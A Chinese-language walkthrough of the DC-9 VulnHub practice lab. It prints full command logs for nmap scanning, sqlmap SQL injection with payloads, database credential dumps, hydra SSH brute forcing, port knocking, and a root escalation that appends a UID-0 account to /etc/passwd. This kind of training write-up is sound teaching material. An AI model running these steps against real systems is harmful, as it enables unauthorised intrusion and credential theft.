DC-9

0x00.官网描述

DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

0x01.老规矩nmap

可以发现1为网关，2为宿主机，6为kali，那么8就是我们的受害者

root@JIYE:~/vulnhub/dc9# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 02:16 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0026s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00032s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.8
Host is up (0.00028s latency).
MAC Address: 00:0C:29:D7:7C:A8 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.08 seconds
root@JIYE:~/vulnhub/dc9#

0x02.继续nmap扫描服务及端口

可以发现开放了22/80端口，发现ssh状态为filtered（过滤），推测安装了knockd

root@JIYE:~/vulnhub/dc9# nmap -sC -sV -v 192.168.1.8 -oN nmap.demo
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 02:17 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Initiating ARP Ping Scan at 02:17
Scanning 192.168.1.8 [1 port]
Completed ARP Ping Scan at 02:17, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:17
Completed Parallel DNS resolution of 1 host. at 02:17, 0.03s elapsed
Initiating SYN Stealth Scan at 02:17
Scanning 192.168.1.8 [1000 ports]
Discovered open port 80/tcp on 192.168.1.8
Completed SYN Stealth Scan at 02:17, 0.06s elapsed (1000 total ports)
Initiating Service scan at 02:17
Scanning 1 service on 192.168.1.8
Completed Service scan at 02:17, 6.25s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.1.8.
Initiating NSE at 02:17
Completed NSE at 02:17, 0.91s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Nmap scan report for 192.168.1.8
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:D7:7C:A8 (VMware)

NSE: Script Post-scanning.
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds
           Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.064KB)
root@JIYE:~/vulnhub/dc9#

0x03.发现80端口，直接访问

发现了一些用户，一个登入框，一个搜索框，就没有其他有用的信息了

0x04.抓包，扫描注入点

1.这里对搜索框与登入框进行了抓包

2.编辑文件

root@JIYE:~/vulnhub/dc9# cat demo.txt 
POST /results.php HTTP/1.1
Host: 192.168.1.8
Content-Length: 8
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Origin: http://192.168.1.8
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.8/search.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESS6ea13d7ee6970decd87c6ae82c8909ff=6hCT-InqREqWsLqJQMvcblMzdjfBuTsTvOqLVecWfjs; PHPSESSID=pdng34438k3h323o5l59vk46k4
Connection: close

search=1
root@JIYE:~/vulnhub/dc9# 

3.扫描注入点，发现search存在注入

root@JIYE:~/vulnhub/dc9# sqlmap -r demo.txt --dbs --batch
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.8#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:55:09 /2020-09-02/

[02:55:09] [INFO] parsing HTTP request from 'demo.txt'
[02:55:10] [INFO] testing connection to the target URL
[02:55:10] [INFO] testing if the target URL content is stable
[02:55:10] [INFO] target URL content is stable
[02:55:10] [INFO] testing if POST parameter 'search' is dynamic
[02:55:10] [WARNING] POST parameter 'search' does not appear to be dynamic
[02:55:10] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[02:55:10] [INFO] testing for SQL injection on POST parameter 'search'
[02:55:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:55:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:55:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:55:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:55:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:55:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:55:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:55:10] [INFO] testing 'Generic inline queries'
[02:55:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:55:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:55:10] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:55:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:55:31] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[02:55:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:55:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:55:31] [INFO] target URL appears to be UNION injectable with 6 columns
[02:55:31] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 2109 FROM (SELECT(SLEEP(5)))ucaC) AND 'xHdu'='xHdu

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170787171,0x765048726464796263436c4a6d764c4652704579707170484f6754656e7547764a50547565464e45,0x71767a7671),NULL,NULL-- -
---
[02:55:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[02:55:31] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[02:55:31] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.8'

[*] ending @ 02:55:31 /2020-09-02/

root@JIYE:~/vulnhub/dc9#

4.扫描当前数据库，结果为Staff

root@JIYE:~/vulnhub/dc9# sqlmap -r demo.txt --dbs --batch --current-db
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.8#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:57:16 /2020-09-02/

[02:57:16] [INFO] parsing HTTP request from 'demo.txt'
[02:57:16] [INFO] resuming back-end DBMS 'mysql' 
[02:57:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 2109 FROM (SELECT(SLEEP(5)))ucaC) AND 'xHdu'='xHdu

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170787171,0x765048726464796263436c4a6d764c4652704579707170484f6754656e7547764a50547565464e45,0x71767a7671),NULL,NULL-- -
---
[02:57:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[02:57:16] [INFO] fetching current database
current database: 'Staff'
[02:57:17] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[02:57:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.8'

[*] ending @ 02:57:17 /2020-09-02/

root@JIYE:~/vulnhub/dc9#

5.爆表，Users

root@JIYE:~/vulnhub/dc9# sqlmap -r demo.txt -D Staff --tables --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.8#stable}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:59:07 /2020-09-02/

[02:59:07] [INFO] parsing HTTP request from 'demo.txt'
[02:59:07] [INFO] resuming back-end DBMS 'mysql' 
[02:59:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 2109 FROM (SELECT(SLEEP(5)))ucaC) AND 'xHdu'='xHdu

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170787171,0x765048726464796263436c4a6d764c4652704579707170484f6754656e7547764a50547565464e45,0x71767a7671),NULL,NULL-- -
---
[02:59:07] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[02:59:07] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+

[02:59:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.8'

[*] ending @ 02:59:07 /2020-09-02/

root@JIYE:~/vulnhub/dc9#

6.爆字段

root@JIYE:~/vulnhub/dc9# sqlmap -r demo.txt -D Staff -T Users --column --batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.8#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:02:44 /2020-09-02/

[03:02:44] [INFO] parsing HTTP request from 'demo.txt'
[03:02:44] [INFO] resuming back-end DBMS 'mysql' 
[03:02:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 2109 FROM (SELECT(SLEEP(5)))ucaC) AND 'xHdu'='xHdu

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170787171,0x765048726464796263436c4a6d764c4652704579707170484f6754656e7547764a50547565464e45,0x71767a7671),NULL,NULL-- -
---
[03:02:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[03:02:44] [INFO] fetching columns for table 'Users' in database 'Staff'
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column   | Type            |
+----------+-----------------+
| Password | varchar(255)    |
| UserID   | int(6) unsigned |
| Username | varchar(255)    |
+----------+-----------------+

[03:02:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.8'

[*] ending @ 03:02:44 /2020-09-02/

root@JIYE:~/vulnhub/dc9#

7.爆数据

得到admin与hash值

root@JIYE:~/vulnhub/dc9# sqlmap -r demo.txt -D Staff -T Users -C Username,Password --dump --batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.8#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:04:03 /2020-09-02/

[03:04:03] [INFO] parsing HTTP request from 'demo.txt'
[03:04:03] [INFO] resuming back-end DBMS 'mysql' 
[03:04:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 2109 FROM (SELECT(SLEEP(5)))ucaC) AND 'xHdu'='xHdu

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170787171,0x765048726464796263436c4a6d764c4652704579707170484f6754656e7547764a50547565464e45,0x71767a7671),NULL,NULL-- -
---
[03:04:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[03:04:03] [INFO] fetching entries of column(s) 'Password, Username' for table 'Users' in database 'Staff'
[03:04:03] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[03:04:03] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[03:04:03] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[03:04:03] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[03:04:03] [INFO] starting 4 processes 
[03:04:15] [WARNING] no clear password(s) found                                                                                                  
Database: Staff
Table: Users
[1 entry]
+----------+----------------------------------+
| Username | Password                         |
+----------+----------------------------------+
| admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+

[03:04:15] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.8/dump/Staff/Users.csv'
[03:04:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.8'

[*] ending @ 03:04:15 /2020-09-02/

root@JIYE:~/vulnhub/dc9#

8.其他用户信息

之前web界面发现有用户信息，之后又爆出users数据库，所以推测user数据库存放的是用户信息

root@JIYE:~/vulnhub/dc9# sqlmap -r demo.txt -D users -T UserDetails -C username,password --dump --batch
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.8#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:12:26 /2020-09-02/

[03:12:26] [INFO] parsing HTTP request from 'demo.txt'
[03:12:26] [INFO] resuming back-end DBMS 'mysql' 
[03:12:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 2109 FROM (SELECT(SLEEP(5)))ucaC) AND 'xHdu'='xHdu

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170787171,0x765048726464796263436c4a6d764c4652704579707170484f6754656e7547764a50547565464e45,0x71767a7671),NULL,NULL-- -
---
[03:12:26] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[03:12:26] [INFO] fetching entries of column(s) 'password, username' for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+-----------+---------------+
| username  | password      |
+-----------+---------------+
| marym     | 3kfs86sfd     |
| julied    | 468sfdfsd2    |
| fredf     | 4sfd87sfd1    |
| barneyr   | RocksOff      |
| tomc      | TC&TheBoyz    |
| jerrym    | B8m#48sd      |
| wilmaf    | Pebbles       |
| bettyr    | BamBam01      |
| chandlerb | UrAG0D!       |
| joeyt     | Passw0rd      |
| rachelg   | yN72#dsd      |
| rossg     | ILoveRachel   |
| monicag   | 3248dsds7s    |
| phoebeb   | smellycats    |
| scoots    | YR3BVxxxw87   |
| janitor   | Ilovepeepee   |
| janitor2  | Hawaii-Five-0 |
+-----------+---------------+

[03:12:26] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.8/dump/users/UserDetails.csv'
[03:12:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.8'

[*] ending @ 03:12:26 /2020-09-02/

root@JIYE:~/vulnhub/dc9#

0x05.爆破

1.破解admin密码为transorbital1

0x06.登入web application

发现文件不存在，推测存在包含

测试，爆破包含参数略

可以看到数据库跑出来的用户可以进行登入

但是有knockd存在过滤，所以查看knockd配置文件，可以看到三个用户可以登入

nmap测试

root@JIYE:~/vulnhub/dc9# for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 192.168.1.8; done
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 03:52 EDT
Nmap scan report for 192.168.1.8
Host is up (0.00066s latency).

PORT     STATE  SERVICE
7469/tcp closed unknown
MAC Address: 00:0C:29:D7:7C:A8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 03:52 EDT
Nmap scan report for 192.168.1.8
Host is up (0.00048s latency).

PORT     STATE  SERVICE
8475/tcp closed unknown
MAC Address: 00:0C:29:D7:7C:A8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 03:52 EDT
Nmap scan report for 192.168.1.8
Host is up (0.00048s latency).

PORT     STATE  SERVICE
9842/tcp closed unknown
MAC Address: 00:0C:29:D7:7C:A8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
root@JIYE:~/vulnhub/dc9#

0x07.爆破ssh

root@JIYE:~/vulnhub/dc9# hydra -L user.txt -P pass.txt 192.168.1.8 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-02 03:58:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.1.8:22/
[22][ssh] host: 192.168.1.8   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.1.8   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.1.8   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-02 03:59:26
root@JIYE:~/vulnhub/dc9#

ssh登入，只在janitor用户下发现有用的文件，一些密码。并且sudo -l无果

janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Sep  2 17:57 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Sep  2 17:57 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$

0x08.再次爆破ssh

重新编辑密码字典

root@JIYE:~/vulnhub/dc9# cat pass.txt 
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
root@JIYE:~/vulnhub/dc9

再次爆破，又发现一个用户

root@JIYE:~/vulnhub/dc9# hydra -L user.txt -P pass.txt 192.168.1.8 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-02 04:13:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://192.168.1.8:22/
[22][ssh] host: 192.168.1.8   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.1.8   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.1.8   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.1.8   login: janitor   password: Ilovepeepee
[STATUS] 368.00 tries/min, 368 tries in 00:01h, 25 to do in 00:01h, 16 active
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-02 04:14:40
root@JIYE:~/vulnhub/dc9#

0x09.fredf登入

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$

0x10.提权

查看test

此代码含义：

一共两个”参数（文件）”，打开第一个文件，读取里面文件赋值给output；打开第二个文件，写入output，关闭。

fredf@dc-9:/opt/devstuff$ cat test.py 
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
fredf@dc-9:/opt/devstuff$

既然这样就可以向/etc/passwd写入文件

由于/etc/passwd的第二个字段受到密码保护，所以先生成口令

root@JIYE:~# openssl passwd -1 -salt demo 123
$1$demo$N8rNOM51XVLc6Sj7cqsmT/
root@JIYE:~#

编辑
fredf@dc-9:~$ echo 'demo:$1$demo$N8rNOM51XVLc6Sj7cqsmT/:0:0::/root:/bin/bash' > /tmp/demo

执行

fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/demo /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su demo
Password: 
root@dc-9:/opt/devstuff/dist/test# cd
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt 


███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝
                                                                             
Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.


root@dc-9:~#